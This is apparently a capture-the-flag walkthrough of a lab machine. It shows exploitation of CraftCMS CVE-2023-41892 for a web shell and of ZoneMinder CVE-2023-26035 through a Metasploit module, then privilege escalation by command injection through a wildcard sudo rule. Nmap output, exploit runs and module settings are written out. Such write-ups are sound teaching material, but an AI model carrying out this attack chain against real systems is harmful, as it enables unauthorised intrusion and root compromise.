This is an Ubuntu machine running a web site built with a vulnerable version of CraftCMS (CVE-2023-41892). This can be exploited to get an initial shell, then move laterally to SSH user using credentials found in the file system. To escalate privileges, we exploit a vulnerable ZoneMinder version (CVE-2023-26035) to move laterally to another user, then abuse an overly permissive sudo misconfiguration to get root.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-10 16:31 EST
Nmap scan report for 10.129.180.84
Host is up, received user-set (0.087s latency).
Not shown: 61282 closed tcp ports (conn-refused), 4251 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 31.20 seconds
Enumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-10 16:32 EST
Nmap scan report for 10.129.180.84
Host is up, received user-set (0.084s latency).
Scanned at 2023-12-10 16:33:00 EST for 10s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
| 256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 11.07 seconds
Add to hosts file and enumerate the web site with Firefox, it seems it is built with CraftCMS 4.4.14.
For initial foothold, we'll focus on the CMS vulnerabilities.
To get the shell, just run the exploit with the host's URL and a www-data shell is returned.
> python3 exploit.py http://surveillance.htb
[-] Get temporary folder and document root ...
[-] Write payload to temporary file ...
[-] Trigger imagick to write shell ...
[-] Done, enjoy the shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Once inside the host, we find a MySQL backup in /var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip. Just unzip it and dump the contents, we find a hash for user admin (matthew), which looks like SHA-256.
Forward internal port 8080 to Kali 8085 and browse the site with Firefox, a login portal appears. It seems a ZoneMinder server is running on host's port 8080.
Once installed, just start the framework, load the module and configure it properly. For this, just remember that, with the local port forwarding in place, now the victim's 8080 port is accessible from Kali's http://localhost:8085
use unix/webapp/zoneminder_snapshots
set rhosts 0.0.0.0
set rport 8085
set lhost <your IP here>
set targeturi /
set target 0
exploit
Once the metepreter session is received, open a shell and find out it is running under the zoneminder user context.
This meterpreter shell is functional, but not interactive. The best option to upgrade the shell is to send a nc mkfifo reverse shell to Kali, then upgrade to TTY.
The resulting shell is interactive and can be used to do some enumeration in the ZoneMinder root directory /usr/share/zoneminder/www. Inside this location we launch a grep scan for clear text passwords in the file system.
A database.php file is reported in /usr/share/zoneminder/www/api/app/Config/database.php containing MySQL credentials; however, there is not anything useful in the database.
Moving forward, next step is to verify if zoneminder is a sudoer.
> sudo -l
Matching Defaults entries for zoneminder on surveillance:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User zoneminder may run the following commands on surveillance:
(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
This means any user can run any binary called zm*.pl in the /usr/bin/ directory under the root context, no password will be prompted. Moreover, any option can be passed to the binary since a wildcard has been inserted in the /etc/sudoers file. This is a wide open configuration which can be abused using wildcard injection.
Now just run any zm* binary and inject a command calling the exploit, it will be executed under the root context. For example, using zmupdate with the --version=1 option will force the tool to upgrade the database, and it allows us to inject a command.
